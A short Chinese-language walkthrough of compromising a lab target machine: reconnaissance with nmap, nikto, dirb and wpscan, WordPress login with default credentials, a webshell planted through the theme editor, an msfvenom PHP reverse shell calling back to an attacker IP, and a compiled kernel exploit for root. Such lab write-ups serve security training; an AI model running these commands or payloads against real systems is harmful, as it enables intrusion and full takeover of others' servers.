高難度滲透靶機
1、掃描靶機資訊
nmap -sV 192.168.222.130
nmap -A -v -T4 192.168.222.130
nikto -host 192.168.222.130 //掃描網站目錄
dirb http://192.168.222.130 //掃描關鍵資訊
由于wordpress檔案,判斷是否是某個CMS,是否具有可以直接利用的漏洞; wpscan -url url -enumerate at -enumerate ap --enumerate u wordpress基于php的CMS管理系統 wpscan --url http://192.168.222.130/wordpress --enumerate at --enumerate ap --enumerate u
對網頁進行弱密碼測驗
1、192.168.222.128/wordpress/login.php
弱密碼 admin admin登錄成功2、點擊Appearance > Editor > 編輯可以上傳的webshell
使用msfvenom生成可以接受到msf的回彈shell msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.222.128 lport=4444 -f raw > /root/shell.php
上傳成功之后訪問該404網頁
在msf中接受回彈結果
msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp //設定payload set lhost 192.168.222.128 //設定回彈攻擊機的IP地址 set lport 4444 //設定回彈的埠
查看該系統的內核版本,進行內核滲透
sysinfo 查看系統資訊 利用searchsploit Linux ubuntu 4.4.0 查看內核版本漏洞的exp
使用這個exp
gcc 41458.c -o shell gcc編譯完之后輸出shell 在meterpreter上傳剛才編譯好的檔案 upload shell
chmod 777 shell //給與其最高權限 ./shell //運行該程式 獲得root權限
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/330103.html
標籤:其他